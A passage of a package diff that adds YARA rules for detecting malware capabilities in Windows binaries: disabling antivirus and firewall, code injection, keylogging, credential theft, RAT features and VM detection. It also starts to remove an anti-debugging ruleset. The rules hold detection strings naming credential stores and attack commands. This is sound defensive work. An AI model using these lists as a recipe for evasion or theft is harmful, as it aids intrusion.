+        $p1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun" nocase
+        $p2 = "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\" nocase
+        $p3 = "SOFTWARE\\Policies\\Microsoft\\Windows Defender" nocase
+        $c1 = "RegSetValue" 
+        $r1 = "AntiVirusDisableNotify" 
+        $r2 = "DontReportInfectionInformation" 
+        $r3 = "DisableAntiSpyware" 
+        $r4 = "RunInvalidSignatures" 
+        $r5 = "AntiVirusOverride" 
+        $r6 = "CheckExeSignatures" 
+        $f1 = "blackd.exe" nocase
+        $f2 = "blackice.exe" nocase
+        $f3 = "lockdown.exe" nocase
+        $f4 = "lockdown2000.exe" nocase
+        $f5 = "taskkill.exe" nocase
+        $f6 = "tskill.exe" nocase
+        $f7 = "smc.exe" nocase
+        $f8 = "sniffem.exe" nocase
+        $f9 = "zapro.exe" nocase
+        $f10 = "zlclient.exe" nocase
+        $f11 = "zonealarm.exe" nocase
+    condition:
+        ($c1 and $p1 and 1 of ($f*)) or ($c1 and $p2) or 1 of ($r*) or $p3
+}
+
+rule disable_uax {
+    meta:
+        author = "x0r"
+        description = "Disable User Access Control"
+	version = "0.1"
+    strings:
+        $p1 = "SOFTWARE\\Microsoft\\Security Center" nocase
+        $r1 = "UACDisableNotify"
+    condition:
+        all of them
+}
+
+rule disable_firewall {
+    meta:
+        author = "x0r"
+        description = "Disable Firewall"
+	version = "0.1"
+    strings:
+        $p1 = "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy" nocase
+        $c1 = "RegSetValue" 
+        $r1 = "FirewallPolicy" 
+        $r2 = "EnableFirewall" 
+        $r3 = "FirewallDisableNotify" 
+        $s1 = "netsh firewall add allowedprogram"
+    condition:
+        (1 of ($p*) and $c1 and 1 of ($r*)) or $s1
+}
+
+rule disable_registry {
+    meta:
+        author = "x0r"
+        description = "Disable Registry editor"
+	version = "0.1"
+    strings:
+        $p1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" nocase
+        $c1 = "RegSetValue" 
+        $r1 = "DisableRegistryTools" 
+        $r2 = "DisableRegedit" 
+    condition:
+        1 of ($p*) and $c1 and 1 of ($r*)
+}
+
+rule disable_dep {
+    meta:
+        author = "x0r"
+        description = "Bypass DEP"
+	version = "0.1"
+    strings:
+        $c1 = "EnableExecuteProtectionSupport" 
+        $c2 = "NtSetInformationProcess" 
+        $c3 = "VirtualProctectEx" 
+        $c4 = "SetProcessDEPPolicy" 
+        $c5 = "ZwProtectVirtualMemory" 
+    condition:
+        any of them
+}
+
+rule disable_taskmanager {
+    meta:
+        author = "x0r"
+        description = "Disable Task Manager"
+	version = "0.1"
+    strings:
+        $p1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" nocase
+        $r1 = "DisableTaskMgr" 
+    condition:
+        1 of ($p*) and 1 of ($r*)
+}
+
+rule inject_thread {
+    meta:
+        author = "x0r"
+        description = "Code injection with CreateRemoteThread in a remote process"
+	version = "0.1"
+    strings:
+        $c1 = "OpenProcess" 
+        $c2 = "VirtualAllocEx" 
+        $c3 = "NtWriteVirtualMemory" 
+        $c4 = "WriteProcessMemory" 
+        $c5 = "CreateRemoteThread"
+        $c6 = "CreateThread"
+        $c7 = "OpenProcess" 
+    condition:
+        $c1 and $c2 and ( $c3 or $c4 ) and ( $c5 or $c6 or $c7 )
+}
+// Issue #101 - Commented because of High FP rate
+/*
+rule create_process {
+    meta:
+        author = "x0r"
+        description = "Create a new process"
+	version = "0.2"
+    strings:
+        $f1 = "Shell32.dll" nocase
+        $f2 = "Kernel32.dll" nocase
+        $c1 = "ShellExecute" 
+        $c2 = "WinExec" 
+        $c3 = "CreateProcess"
+        $c4 = "CreateThread"
+    condition:
+        ($f1 and $c1 ) or $f2 and ($c2 or $c3 or $c4)
+}
+*/
+
+// Issue #101 - Commented because of High FP rate
+/*
+rule persistence {
+    meta:
+        author = "x0r"
+        description = "Install itself for autorun at Windows startup"
+	version = "0.1"
+    strings:
+        $p1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" nocase
+        $p2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce" nocase
+        $p3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices" nocase
+        $p4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce" nocase
+        $p5 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" nocase
+        $p6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run" nocase
+        $p7 = "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\" nocase
+        $p8 = "SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\Windows" nocase
+        $p9 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SharedTaskScheduler" nocase
+        $p10 = "comfile\\shell\\open\\command" nocase
+        $p11 = "piffile\\shell\\open\\command" nocase
+        $p12 = "exefile\\shell\\open\\command" nocase
+        $p13 = "txtfile\\shell\\open\\command" nocase
+	$p14 = "\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"
+        $f1 = "win.ini" nocase
+        $f2 = "system.ini" nocase
+        $f3 = "Start Menu\\Programs\\Startup" nocase
+    condition:
+        any of them
+}
+*/
+
+rule hijack_network {
+    meta:
+        author = "x0r"
+        description = "Hijack network configuration"
+	version = "0.1"
+    strings:
+        $p1 = "SOFTWARE\\Classes\\PROTOCOLS\\Handler" nocase
+        $p2 = "SOFTWARE\\Classes\\PROTOCOLS\\Filter" nocase
+        $p3 = "Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer" nocase
+        $p4 = "software\\microsoft\\windows\\currentversion\\internet settings\\proxyenable" nocase
+        $f1 = "drivers\\etc\\hosts" nocase
+    condition:
+        any of them
+}
+
+rule create_service {
+    meta:
+        author = "x0r"
+        description = "Create a windows service"
+	version = "0.2"
+    strings:
+	$f1 = "Advapi32.dll" nocase
+        $c1 = "CreateService" 
+        $c2 = "ControlService" 
+        $c3 = "StartService" 
+        $c4 = "QueryServiceStatus" 
+    condition:
+        all of them
+}
+
+rule create_com_service {
+    meta:
+        author = "x0r"
+        description = "Create a COM server"
+	version = "0.1"
+    strings:
+        $c1 = "DllCanUnloadNow" nocase
+        $c2 = "DllGetClassObject" 
+        $c3 = "DllInstall" 
+        $c4 = "DllRegisterServer" 
+        $c5 = "DllUnregisterServer" 
+    condition:
+        all of them
+}
+
+rule network_udp_sock {
+    meta:
+        author = "x0r"
+        description = "Communications over UDP network"
+	version = "0.1"
+    strings:
+        $f1 = "Ws2_32.dll" nocase
+	$f2 = "System.Net" nocase
+        $f3 = "wsock32.dll" nocase
+        $c0 = "WSAStartup" 
+        $c1 = "sendto" 
+        $c2 = "recvfrom" 
+        $c3 = "WSASendTo" 
+        $c4 = "WSARecvFrom" 
+        $c5 = "UdpClient" 
+    condition:
+        (($f1 or $f3) and 2 of ($c*)) or ($f2 and $c5)
+}
+
+rule network_tcp_listen {
+    meta:
+        author = "x0r"
+        description = "Listen for incoming communication"
+	version = "0.1"
+    strings:
+        $f1 = "Ws2_32.dll" nocase
+        $f2 = "Mswsock.dll" nocase
+	    $f3 = "System.Net" nocase
+        $f4 = "wsock32.dll" nocase
+        $c1 = "bind" 
+        $c2 = "accept" 
+        $c3 = "GetAcceptExSockaddrs"
+        $c4 = "AcceptEx" 
+        $c5 = "WSAStartup" 
+        $c6 = "WSAAccept" 
+        $c7 = "WSASocket" 
+        $c8 = "TcpListener" 
+        $c9 = "AcceptTcpClient"
+        $c10 = "listen"
+    condition:
+        1 of ($f*) and 2 of ($c*)
+}
+
+rule network_dyndns {
+    meta:
+        author = "x0r"
+        description = "Communications dyndns network"
+	version = "0.1"
+    strings:	
+	$s1 =".no-ip.org"
+        $s2 =".publicvm.com"
+        $s3 =".linkpc.net"
+        $s4 =".dynu.com"
+        $s5 =".dynu.net"
+        $s6 =".afraid.org"
+        $s7 =".chickenkiller.com"
+        $s8 =".crabdance.com"
+        $s9 =".ignorelist.com"
+        $s10 =".jumpingcrab.com"
+        $s11 =".moo.com"
+        $s12 =".strangled.com"
+        $s13 =".twillightparadox.com"
+        $s14 =".us.to"
+        $s15 =".strangled.net"
+        $s16 =".info.tm"
+        $s17 =".homenet.org"
+        $s18 =".biz.tm"
+        $s19 =".continent.kz"
+        $s20 =".ax.lt"
+        $s21 =".system-ns.com"
+        $s22 =".adultdns.com"
+        $s23 =".craftx.biz"
+        $s24 =".ddns01.com"
+        $s25 =".dns53.biz"
+        $s26 =".dnsapi.info"
+        $s27 =".dnsd.info"
+        $s28 =".dnsdynamic.com"
+        $s29 =".dnsdynamic.net"
+        $s30 =".dnsget.org"
+        $s31 =".fe100.net"
+        $s32 =".flashserv.net"
+        $s33 =".ftp21.net"
+    condition:
+        any of them
+}
+
+rule network_toredo {
+    meta:
+        author = "x0r"
+        description = "Communications over Toredo network"
+	version = "0.1"
+    strings:	
+	$f1 = "FirewallAPI.dll" nocase
+        $p1 = "\\CurrentControlSet\\Services\\Tcpip6\\Parameters\\Interfaces\\" nocase
+    condition:
+        all of them
+}
+
+rule network_smtp_dotNet {
+    meta:
+        author = "x0r"
+        description = "Communications smtp"
+	version = "0.1"
+    strings:	
+	$f1 = "System.Net.Mail" nocase
+        $p1 = "SmtpClient" nocase
+    condition:
+        all of them
+}
+
+rule network_smtp_raw {
+    meta:
+        author = "x0r"
+        description = "Communications smtp"
+	version = "0.1"
+    strings:	
+	$s1 = "MAIL FROM:" nocase
+        $s2 = "RCPT TO:" nocase
+    condition:
+        all of them
+}
+
+rule network_smtp_vb {
+    meta:
+        author = "x0r"
+        description = "Communications smtp"
+	version = "0.1"
+    strings:	
+	$c1 = "CDO.Message" nocase
+        $c2 = "cdoSMTPServer" nocase
+        $c3 = "cdoSendUsingMethod" nocase
+        $c4 = "cdoex.dll" nocase
+        $c5 = "/cdo/configuration/smtpserver" nocase
+    condition:
+        any of them
+}
+
+rule network_p2p_win {
+    meta:
+        author = "x0r"
+        description = "Communications over P2P network"
+	version = "0.1"
+    strings:	
+     	$c1 = "PeerCollabExportContact"
+     	$c2 = "PeerCollabGetApplicationRegistrationInfo"
+     	$c3 = "PeerCollabGetEndpointName"
+     	$c4 = "PeerCollabGetEventData"
+     	$c5 = "PeerCollabGetInvitationResponse"
+     	$c6 = "PeerCollabGetPresenceInfo"
+     	$c7 = "PeerCollabGetSigninOptions"
+     	$c8 = "PeerCollabInviteContact"
+     	$c9 = "PeerCollabInviteEndpoint"
+     	$c10 = "PeerCollabParseContact"
+     	$c11 = "PeerCollabQueryContactData"
+     	$c12 = "PeerCollabRefreshEndpointData"
+     	$c13 = "PeerCollabRegisterApplication"
+     	$c14 = "PeerCollabRegisterEvent"
+     	$c15 = "PeerCollabSetEndpointName"
+     	$c16 = "PeerCollabSetObject"
+     	$c17 = "PeerCollabSetPresenceInfo"
+     	$c18 = "PeerCollabSignout"
+     	$c19 = "PeerCollabUnregisterApplication"
+     	$c20 = "PeerCollabUpdateContact"
+    condition:
+        5 of them
+}
+
+rule network_tor {
+    meta:
+        author = "x0r"
+        description = "Communications over TOR network"
+	version = "0.1"
+    strings:
+        $p1 = "tor\\hidden_service\\private_key" nocase
+        $p2 = "tor\\hidden_service\\hostname" nocase
+        $p3 = "tor\\lock" nocase
+        $p4 = "tor\\state" nocase
+    condition:
+        any of them
+}
+rule network_irc {
+    meta:
+        author = "x0r"
+        description = "Communications over IRC network"
+	version = "0.1"
+    strings:
+        $s1 = "NICK" 
+        $s2 = "PING" 
+        $s3 = "JOIN" 
+        $s4 = "USER" 
+        $s5 = "PRIVMSG" 
+    condition:
+        all of them
+}
+
+rule network_http {
+    meta:
+        author = "x0r"
+        description = "Communications over HTTP"
+	version = "0.1"
+    strings:
+        $f1 = "wininet.dll" nocase
+        $c1 = "InternetConnect" 
+        $c2 = "InternetOpen" 
+        $c3 = "InternetOpenUrl" 
+        $c4 = "InternetReadFile" 
+        $c5 = "InternetWriteFile" 
+        $c6 = "HttpOpenRequest" 
+        $c7 = "HttpSendRequest" 
+        $c8 = "IdHTTPHeaderInfo" 
+    condition:
+        $f1 and $c1 and ($c2 or $c3) and ($c4 or $c5 or $c6 or $c7 or $c8)
+}
+
+rule network_dropper {
+    meta:
+        author = "x0r"
+        description = "File downloader/dropper" 
+	version = "0.1"
+    strings:
+        $f1 = "urlmon.dll" nocase
+        $c1 = "URLDownloadToFile" 
+        $c2 = "URLDownloadToCacheFile" 
+        $c3 = "URLOpenStream" 
+        $c4 = "URLOpenPullStream" 
+    condition:
+        $f1 and 1 of ($c*)
+}
+
+rule network_ftp {
+    meta:
+        author = "x0r"
+        description = "Communications over FTP" 
+	version = "0.1"
+    strings:
+	   $f1 = "Wininet.dll" nocase
+        $c1 = "FtpGetCurrentDirectory" 
+        $c2 = "FtpGetFile" 
+        $c3 = "FtpPutFile" 
+        $c4 = "FtpSetCurrentDirectory" 
+        $c5 = "FtpOpenFile" 
+        $c6 = "FtpGetFileSize" 
+        $c7 = "FtpDeleteFile" 
+        $c8 = "FtpCreateDirectory" 
+        $c9 = "FtpRemoveDirectory" 
+        $c10 = "FtpRenameFile" 
+        $c11 = "FtpDownload" 
+        $c12 = "FtpUpload" 
+        $c13 = "FtpGetDirectory" 
+    condition:
+        $f1 and (4 of ($c*))
+}
+
+rule network_tcp_socket {
+    meta:
+        author = "x0r"
+        description = "Communications over RAW socket"
+	version = "0.1"
+    strings:
+	$f1 = "Ws2_32.dll" nocase
+        $f2 = "wsock32.dll" nocase
+        $c1 = "WSASocket" 
+        $c2 = "socket" 
+        $c3 = "send" 
+        $c4 = "WSASend" 
+        $c5 = "WSAConnect"
+        $c6 = "connect"
+        $c7 = "WSAStartup"
+        $c8 = "closesocket"
+        $c9 = "WSACleanup"
+    condition:
+        1 of ($f*) and 2 of ($c*)
+}
+
+rule network_dns {
+    meta:
+        author = "x0r"
+        description = "Communications use DNS"
+	version = "0.1"
+    strings:
+        $f1 = "System.Net" 
+        $f2 = "Ws2_32.dll" nocase
+        $f3 = "Dnsapi.dll" nocase
+        $f4 = "wsock32.dll" nocase        
+        $c2 = "GetHostEntry" 
+	    $c3 = "getaddrinfo"
+	    $c4 = "gethostbyname"
+	    $c5 = "WSAAsyncGetHostByName"
+	    $c6 = "DnsQuery"
+    condition:
+        1 of ($f*) and  1 of ($c*) 
+}
+
+rule network_ssl {
+    meta:
+        author = "x0r"
+        description = "Communications over SSL"
+        version = "0.1"
+    strings:
+        $f1 = "ssleay32.dll" nocase
+        $f2 = "libeay32.dll" nocase
+        $f3 = "libssl32.dll" nocase
+        $c1 = "IdSSLOpenSSL" nocase
+    condition:
+        any of them
+}
+
+rule network_dga {
+    meta:
+        author = "x0r"
+        description = "Communication using dga"
+	version = "0.1"
+    strings: 
+        $dll1 = "Advapi32.dll" nocase
+        $dll2 = "wininet.dll" nocase
+	    $dll3 = "Crypt32.dll" nocase
+        $time1 = "SystemTimeToFileTime"  
+        $time2 = "GetSystemTime"  
+        $time3 = "GetSystemTimeAsFileTime"  
+        $hash1 = "CryptCreateHash" 
+        $hash2 = "CryptAcquireContext" 
+        $hash3 = "CryptHashData" 
+        $net1 = "InternetOpen"  
+        $net2 = "InternetOpenUrl"  
+        $net3 = "gethostbyname"  
+        $net4 = "getaddrinfo"  
+    condition:
+        all of ($dll*) and 1 of ($time*) and 1 of ($hash*) and 1 of ($net*)	
+}
+
+
+rule bitcoin {
+    meta:
+        author = "x0r"
+        description = "Perform crypto currency mining"
+	version = "0.1"
+    strings:
+        $f1 = "OpenCL.dll" nocase
+        $f2 = "nvcuda.dll" nocase
+        $f3 = "opengl32.dll" nocase
+        $s1 = "cpuminer 2.2.2X-Mining-Extensions"
+        $s2 = "cpuminer 2.2.3X-Mining-Extensions"
+	    $s3 = "Ufasoft bitcoin-miner/0.20"
+	    $s4 = "bitcoin" nocase
+	    $s5 = "stratum" nocase
+    condition:
+        1 of ($f*) and 1 of ($s*)
+}
+
+rule certificate {
+    meta:
+        author = "x0r"
+        description = "Inject certificate in store"
+	version = "0.1"
+    strings:
+        $f1 = "Crypt32.dll" nocase
+        $r1 = "software\\microsoft\\systemcertificates\\spc\\certificates" nocase
+        $c1 = "CertOpenSystemStore" 
+    condition:
+	all of them
+}
+
+rule escalate_priv {
+    meta:
+        author = "x0r"
+        description = "Escalade priviledges"
+	version = "0.1"
+    strings:
+        $d1 = "Advapi32.dll" nocase
+        $c1 = "SeDebugPrivilege" 
+        $c2 = "AdjustTokenPrivileges" 
+    condition:
+        1 of ($d*) and 1 of ($c*)
+}
+
+rule screenshot {
+    meta:
+        author = "x0r"
+        description = "Take screenshot"
+	version = "0.1"
+    strings:
+        $d1 = "Gdi32.dll" nocase
+        $d2 = "User32.dll" nocase
+        $c1 = "BitBlt" 
+        $c2 = "GetDC" 
+    condition:
+        1 of ($d*) and 1 of ($c*)
+}
+
+rule lookupip {
+    meta:
+        author = "x0r"
+        description = "Lookup external IP"
+	version = "0.1"
+    strings:
+        $n1 = "checkip.dyndns.org" nocase
+        $n2 = "whatismyip.org" nocase
+        $n3 = "whatsmyipaddress.com" nocase
+        $n4 = "getmyip.org" nocase
+        $n5 = "getmyip.co.uk" nocase
+    condition:
+        any of them
+}
+
+rule dyndns {
+    meta:
+        author = "x0r"
+        description = "Dynamic DNS"
+	version = "0.1"
+    strings:
+        $s1 = "SOFTWARE\\Vitalwerks\\DUC" nocase
+    condition:
+        any of them
+}
+
+rule lookupgeo {
+    meta:
+        author = "x0r"
+        description = "Lookup Geolocation"
+	version = "0.1"
+    strings:
+        $n1 = "j.maxmind.com" nocase
+    condition:
+        any of them
+}
+
+rule keylogger {
+    meta:
+        author = "x0r"
+        description = "Run a keylogger"
+	version = "0.1"
+    strings:
+	    $f1 = "User32.dll" nocase
+        $c1 = "GetAsyncKeyState" 
+        $c2 = "GetKeyState" 
+        $c3 = "MapVirtualKey" 
+        $c4 = "GetKeyboardType"
+    condition:
+        $f1 and 1 of ($c*)
+}
+
+rule cred_local {
+    meta:
+        author = "x0r"
+        description = "Steal credential"
+	version = "0.1"
+    strings:
+        $c1 = "LsaEnumerateLogonSessions"
+        $c2 = "SamIConnect"
+        $c3 = "SamIGetPrivateData"
+        $c4 = "SamQueryInformationUse"
+        $c5 = "CredEnumerateA"
+        $c6 = "CredEnumerateW"
+        $r1 = "software\\microsoft\\internet account manager" nocase
+        $r2 = "software\\microsoft\\identitycrl\\creds" nocase
+        $r3 = "Security\\Policy\\Secrets"
+    condition:
+        any of them
+}
+
+
+rule sniff_audio {
+    meta:
+        author = "x0r"
+        description = "Record Audio"
+        version = "0.1"
+    strings:
+        $f1 = "winmm.dll" nocase
+        $c1 = "waveInStart"
+        $c2 = "waveInReset"
+        $c3 = "waveInAddBuffer"
+        $c4 = "waveInOpen"
+        $c5 = "waveInClose"
+    condition:
+        $f1 and 2 of ($c*)
+}
+
+rule cred_ff {
+    meta:
+        author = "x0r"
+        description = "Steal Firefox credential"
+	version = "0.1"
+    strings:
+        $f1 = "signons.sqlite"
+        $f2 = "signons3.txt"
+        $f3 = "secmod.db"
+        $f4 = "cert8.db"
+        $f5 = "key3.db"
+    condition:
+        any of them
+}
+
+rule cred_vnc {
+    meta:
+        author = "x0r"
+        description = "Steal VNC credential"
+	version = "0.1"
+    strings:
+        $s1 = "VNCPassView"
+    condition:
+        all of them
+}
+
+rule cred_ie7 {
+    meta:
+        author = "x0r"
+        description = "Steal IE 7 credential"
+	version = "0.1"
+    strings:
+        $f1 = "Crypt32.dll" nocase
+        $c1 = "CryptUnprotectData" 
+        $s1 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" nocase
+    condition:
+        all of them
+}
+
+rule sniff_lan {
+    meta:
+        author = "x0r"
+        description = "Sniff Lan network traffic"
+	version = "0.1"
+    strings:
+        $f1 = "packet.dll" nocase
+        $f2 = "npf.sys" nocase
+        $f3 = "wpcap.dll" nocase
+        $f4 = "winpcap.dll" nocase
+    condition:
+        any of them
+}
+
+rule migrate_apc {
+    meta:
+        author = "x0r"
+        description = "APC queue tasks migration"
+	version = "0.1"
+    strings:
+        $c1 = "OpenThread" 
+        $c2 = "QueueUserAPC" 
+    condition:
+        all of them
+}
+
+rule spreading_file {
+    meta:
+        author = "x0r"
+        description = "Malware can spread east-west file"
+	version = "0.1"
+    strings:
+        $f1 = "autorun.inf" nocase
+        $f2 = "desktop.ini" nocase
+        $f3 = "desktop.lnk" nocase
+    condition:
+        any of them
+}
+
+rule spreading_share {
+    meta:
+        author = "x0r"
+        description = "Malware can spread east-west using share drive"
+        version = "0.1"
+    strings:
+        $f1 = "netapi32.dll" nocase
+        $c1 = "NetShareGetInfo" 
+        $c2 = "NetShareEnum" 
+    condition:
+        $f1 and 1 of ($c*)
+}
+
+rule rat_vnc {
+    meta:
+        author = "x0r"
+        description = "Remote Administration toolkit VNC"
+	version = "0.1"
+    strings:
+        $f1 = "ultravnc.ini" nocase
+        $c2 = "StartVNC" 
+        $c3 = "StopVNC" 
+    condition:
+        any of them
+}
+
+rule rat_rdp {
+    meta:
+        author = "x0r"
+        description = "Remote Administration toolkit enable RDP"
+	version = "0.1"
+    strings:
+        $p1 = "SYSTEM\\CurrentControlSet\\Control\\Terminal Server" nocase
+        $p2 = "software\\microsoft\\windows nt\\currentversion\\terminal server" nocase
+        $p3 = "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" nocase
+        $r1 = "EnableAdminTSRemote"
+        $c1 = "net start termservice"
+        $c2 = "sc config termservice start"
+    condition:
+        any of them
+}
+
+rule rat_telnet {
+    meta:
+        author = "x0r"
+        description = "Remote Administration toolkit enable Telnet"
+        version = "0.1"
+    strings:
+        $r1 = "software\\microsoft\\telnetserver" nocase
+    condition:
+        any of them
+}
+
+
+rule rat_webcam {
+    meta:
+        author = "x0r"
+        description = "Remote Administration toolkit using webcam"
+        version = "0.1"
+    strings:
+        $f1 = "avicap32.dll" nocase
+        $c1 = "capCreateCaptureWindow" nocase
+    condition:
+        all of them
+}
+
+rule check_patchlevel {
+    meta:
+        author = "x0r"
+        description = "Check if hotfix are applied"
+	version = "0.1"
+    strings:
+        $p1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Hotfix" nocase
+    condition:
+        any of them
+}
+
+rule win_mutex {
+    meta:
+        author = "x0r"
+        description = "Create or check mutex"
+    version = "0.1"
+    strings:
+        $c1 = "CreateMutex" 
+    condition:
+        1 of ($c*)
+}
+
+rule win_registry {
+    meta:
+        author = "x0r"
+        description = "Affect system registries"
+    version = "0.1"
+    strings:
+        $f1 = "advapi32.dll" nocase
+        $c1 = "RegQueryValueExA"
+        $c2 = "RegOpenKeyExA"
+        $c3 = "RegCloseKey"
+        $c4 = "RegSetValueExA"
+        $c5 = "RegCreateKeyA"
+        $c6 = "RegCloseKey"                  
+    condition:
+        $f1 and 1 of ($c*)
+}
+
+rule win_token {
+    meta:
+        author = "x0r"
+        description = "Affect system token"
+    version = "0.1"
+    strings:
+        $f1 = "advapi32.dll" nocase
+        $c1 = "DuplicateTokenEx"
+        $c2 = "AdjustTokenPrivileges"
+        $c3 = "OpenProcessToken"
+        $c4 = "LookupPrivilegeValueA"            
+    condition:
+        $f1 and 1 of ($c*)
+}
+
+rule win_private_profile {
+    meta:
+        author = "x0r"
+        description = "Affect private profile"
+    version = "0.1"
+    strings:
+        $f1 = "kernel32.dll" nocase
+        $c1 = "GetPrivateProfileIntA"
+        $c2 = "GetPrivateProfileStringA"
+        $c3 = "WritePrivateProfileStringA"         
+    condition:
+        $f1 and 1 of ($c*)
+}
+
+rule win_files_operation {
+    meta:
+        author = "x0r"
+        description = "Affect private profile"
+    version = "0.1"
+    strings:
+        $f1 = "kernel32.dll" nocase
+        $c1 = "WriteFile"
+        $c2 = "SetFilePointer"
+        $c3 = "WriteFile"
+        $c4 = "ReadFile"
+        $c5 = "DeleteFileA"
+        $c6 = "CreateFileA"
+        $c7 = "FindFirstFileA"
+        $c8 = "MoveFileExA"
+        $c9 = "FindClose"
+        $c10 = "SetFileAttributesA"
+        $c11 = "CopyFile"
+
+    condition:
+        $f1 and 3 of ($c*)
+}
+
+
+rule win_hook {
+    meta:
+        author = "x0r"
+        description = "Affect hook table"
+    version = "0.1"
+    strings:
+        $f1 = "user32.dll" nocase
+        $c1 = "UnhookWindowsHookEx"
+        $c2 = "SetWindowsHookExA"
+        $c3 = "CallNextHookEx"         
+    condition:
+        $f1 and 1 of ($c*)
+}
+rule vmdetect_misc : vmdetect
+{
+	meta:
+    		author = "@abhinavbom"
+		maltype = "NA"
+		version = "0.1"
+		date = "31/10/2015"
+		description = "Following Rule is referenced from AlienVault's Yara rule repository.This rule contains additional processes and driver names."
+	strings:
+		$vbox1 = "VBoxService" nocase ascii wide
+		$vbox2 = "VBoxTray" nocase ascii wide
+		$vbox3 = "SOFTWARE\\Oracle\\VirtualBox Guest Additions" nocase ascii wide
+		$vbox4 = "SOFTWARE\\\\Oracle\\\\VirtualBox Guest Additions" nocase ascii wide
+
+		$wine1 = "wine_get_unix_file_name" ascii wide
+
+		$vmware1 = "vmmouse.sys" ascii wide
+		$vmware2 = "VMware Virtual IDE Hard Drive" ascii wide
+
+		$miscvm1 = "SYSTEM\\ControlSet001\\Services\\Disk\\Enum" nocase ascii wide
+		$miscvm2 = "SYSTEM\\\\ControlSet001\\\\Services\\\\Disk\\\\Enum" nocase ascii wide
+
+		// Drivers
+		$vmdrv1 = "hgfs.sys" ascii wide
+		$vmdrv2 = "vmhgfs.sys" ascii wide
+		$vmdrv3 = "prleth.sys" ascii wide
+		$vmdrv4 = "prlfs.sys" ascii wide
+		$vmdrv5 = "prlmouse.sys" ascii wide
+		$vmdrv6 = "prlvideo.sys" ascii wide
+		$vmdrv7 = "prl_pv32.sys" ascii wide
+		$vmdrv8 = "vpc-s3.sys" ascii wide
+		$vmdrv9 = "vmsrvc.sys" ascii wide
+		$vmdrv10 = "vmx86.sys" ascii wide
+		$vmdrv11 = "vmnet.sys" ascii wide
+
+		// SYSTEM\ControlSet001\Services
+		$vmsrvc1 = "vmicheartbeat" ascii wide
+		$vmsrvc2 = "vmicvss" ascii wide
+		$vmsrvc3 = "vmicshutdown" ascii wide
+		$vmsrvc4 = "vmicexchange" ascii wide
+		$vmsrvc5 = "vmci" ascii wide
+		$vmsrvc6 = "vmdebug" ascii wide
+		$vmsrvc7 = "vmmouse" ascii wide
+		$vmsrvc8 = "VMTools" ascii wide
+		$vmsrvc9 = "VMMEMCTL" ascii wide
+		$vmsrvc10 = "vmware" ascii wide
+		$vmsrvc11 = "vmx86" ascii wide
+		$vmsrvc12 = "vpcbus" ascii wide
+		$vmsrvc13 = "vpc-s3" ascii wide
+		$vmsrvc14 = "vpcuhub" ascii wide
+		$vmsrvc15 = "msvmmouf" ascii wide
+		$vmsrvc16 = "VBoxMouse" ascii wide
+		$vmsrvc17 = "VBoxGuest" ascii wide
+		$vmsrvc18 = "VBoxSF" ascii wide
+		$vmsrvc19 = "xenevtchn" ascii wide
+		$vmsrvc20 = "xennet" ascii wide
+		$vmsrvc21 = "xennet6" ascii wide
+		$vmsrvc22 = "xensvc" ascii wide
+		$vmsrvc23 = "xenvdb" ascii wide
+
+		// Processes
+		$miscproc1 = "vmware2" ascii wide
+		$miscproc2 = "vmount2" ascii wide
+		$miscproc3 = "vmusrvc" ascii wide
+		$miscproc4 = "vmsrvc" ascii wide
+		$miscproc5 = "vboxservice" ascii wide
+		$miscproc6 = "vboxtray" ascii wide
+		$miscproc7 = "xenservice" ascii wide
+
+		$vmware_mac_1a = "00-05-69"
+		$vmware_mac_1b = "00:05:69"
+		$vmware_mac_2a = "00-50-56"
+		$vmware_mac_2b = "00:50:56"
+		$vmware_mac_3a = "00-0C-29"
+		$vmware_mac_3b = "00:0C:29"
+		$vmware_mac_4a = "00-1C-14"
+		$vmware_mac_4b = "00:1C:14"
+		$virtualbox_mac_1a = "08-00-27"
+		$virtualbox_mac_1b = "08:00:27"
+
+	condition:
+		2 of them
+}
diff -Nru remnux-rules-0.0.3/yara/antidebug.yara remnux-rules-0.0.4/yara/antidebug.yara
--- remnux-rules-0.0.3/yara/antidebug.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/antidebug.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,589 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule DebuggerCheck__API : AntiDebug DebuggerCheck {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="IsDebuggerPresent"
-	condition:
-		any of them
-}
-
-rule DebuggerCheck__PEB : AntiDebug DebuggerCheck {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="IsDebugged"
-	condition:
-		any of them
-}
-
-rule DebuggerCheck__GlobalFlags : AntiDebug DebuggerCheck {
-	meta:
-		weight = 1
-		Author = "naxonez"
-		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
-	strings:
-		$ ="NtGlobalFlags"
-	condition:
-		any of them
-}
-
-rule DebuggerCheck__QueryInfo : AntiDebug DebuggerCheck {
-	meta:
-		weight = 1
-		Author = "naxonez"
